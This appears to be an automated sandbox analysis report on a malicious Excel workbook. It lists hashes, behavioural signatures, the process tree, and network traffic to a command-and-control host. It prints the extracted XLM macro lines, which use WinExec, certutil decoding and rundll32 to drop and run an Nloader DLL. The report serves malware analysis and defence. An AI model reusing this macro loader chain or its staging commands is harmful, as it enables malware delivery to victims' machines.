Analysis
-
max time kernel
116s -
max time network
11s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13/04/2021, 21:04 UTC
Behavioral task
behavioral1
Sample
subscription_1617056233.xlsb
Resource
win7v20210410
0 signatures
0 seconds
General
-
Target
subscription_1617056233.xlsb
-
Size
177KB
-
MD5
1d1ba411ff36cdd1b1350341624ac008
-
SHA1
becdec14b92c6d67b3aa28fdbf4293dabb7b0055
-
SHA256
ae6dbc08e0e21b217352175f916cfd5269c4fd8d5de6bff2d0a93a366f78e8d1
-
SHA512
89a9df6e41300e05c71af3eb45acd7cd6c3915bc511d00cc2a420c5d3a274a704798b3e48e93ffccd7813ee2a25e96a2c1c1f4d1e84ed86c144f2e79af501ef0
Malware Config
Extracted
Language
xlm4.0
Source
1
=CALL("Kernel32", "WinExec", "CJ", "cmd.exe /c certutil -decode %PUBLIC%\4123.xsg %PUBLIC%\4123.do1", 0)
2
=CALL("Kernel32", "WinExec", "CJ", "rundll32 C:\Users\Public\4123.do1,DF1", 0)
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1232 788 cmd.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1820 788 rundll32.exe 24 -
Nloader Payload 4 IoCs
resource yara_rule behavioral1/memory/1820-71-0x0000000000200000-0x0000000000209000-memory.dmp nloader behavioral1/memory/1820-74-0x0000000000210000-0x0000000000217000-memory.dmp nloader behavioral1/memory/1820-77-0x0000000000230000-0x0000000000235000-memory.dmp nloader behavioral1/memory/1820-79-0x0000000000160000-0x0000000000166000-memory.dmp nloader -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1820 rundll32.exe -
Loads dropped DLL 1 IoCs
pid Process 1820 rundll32.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 788 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 788 EXCEL.EXE 788 EXCEL.EXE 788 EXCEL.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 788 wrote to memory of 1232 788 EXCEL.EXE 27 PID 788 wrote to memory of 1232 788 EXCEL.EXE 27 PID 788 wrote to memory of 1232 788 EXCEL.EXE 27 PID 788 wrote to memory of 1232 788 EXCEL.EXE 27 PID 1232 wrote to memory of 1228 1232 cmd.exe 29 PID 1232 wrote to memory of 1228 1232 cmd.exe 29 PID 1232 wrote to memory of 1228 1232 cmd.exe 29 PID 1232 wrote to memory of 1228 1232 cmd.exe 29 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33 PID 788 wrote to memory of 1820 788 EXCEL.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\subscription_1617056233.xlsb1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\cmd.execmd.exe /c certutil -decode %PUBLIC%\4123.xsg %PUBLIC%\4123.do12⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\certutil.execertutil -decode C:\Users\Public\4123.xsg C:\Users\Public\4123.do13⤵PID:1228
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32 C:\Users\Public\4123.do1,DF12⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
PID:1820
-
Network
-
Remote address:8.8.8.8:53Requestveso2.xyzIN AResponseveso2.xyzIN A198.54.117.244
-
Remote address:198.54.117.244:80RequestPOST /campo/r/r1 HTTP/1.1
Host: veso2.xyz
Pragma: no-cache
Content-Length: 4
-
225 B 132 B 3 3
HTTP Request
POST http://veso2.xyz/campo/r/r1